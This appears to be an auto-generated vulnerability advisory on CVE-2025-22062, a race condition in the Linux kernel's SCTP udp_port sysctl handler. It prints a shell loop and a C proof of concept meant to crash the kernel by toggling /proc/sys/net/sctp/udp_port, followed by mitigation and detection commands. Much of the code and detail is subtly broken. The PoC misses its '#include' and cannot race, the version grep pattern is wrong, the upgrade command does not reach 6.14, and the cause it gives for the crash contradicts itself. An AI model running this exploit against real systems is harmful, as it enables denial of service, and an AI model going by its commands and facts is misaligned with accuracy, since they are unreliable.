How CVE-2025-22062 Works
The vulnerability exists in the Linux kernel’s SCTP (Stream Control Transmission Protocol) implementation. A race condition occurs in `proc_sctp_do_udp_port()` due to missing mutual exclusion when handling UDP tunnel sockets. Concurrent calls to `sctp_udp_sock_stop()` and `sctp_udp_sock_start()` can lead to a null-pointer dereference, causing a kernel crash (general protection fault). Attackers exploiting this flaw could trigger denial-of-service (DoS) conditions or potentially escalate privileges via crafted sysctl operations.
DailyCVE Form
Platform: Linux Kernel
Version: Pre-6.14
Vulnerability: Race Condition
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploitation:
1. Trigger Race Condition:
while true; do echo 1 > /proc/sys/net/sctp/udp_port; done & while true; do echo 0 > /proc/sys/net/sctp/udp_port; done &
2. Crash Kernel: Repeated toggling exhausts socket resources.
Mitigation:
1. Patch: Upgrade to kernel v6.14+.
sudo apt-get update && sudo apt-get upgrade linux-image-$(uname -r)
2. Temporary Workaround: Restrict `/proc/sys/net/sctp/udp_port` access:
chmod 600 /proc/sys/net/sctp/udp_port
Detection:
1. Check Kernel Version:
uname -r | grep -E '6.(0-13).'
2. Audit Logs:
dmesg | grep "general protection fault"
Proof of Concept (PoC):
include <fcntl.h>
int main() {
while(1) {
int fd = open("/proc/sys/net/sctp/udp_port", O_WRONLY);
write(fd, "1", 1); close(fd);
fd = open("/proc/sys/net/sctp/udp_port", O_WRONLY);
write(fd, "0", 1); close(fd);
}
}
CVSS 4.0 Metrics:
- Vector: `CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`
– Base Score: 9.1 (Critical)
Affected Configurations:
- Linux kernels <6.14 with SCTP module loaded (
lsmod | grep sctp).
References:
- Kernel.org Patch Commit
- NVD CVE-2025-22062
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
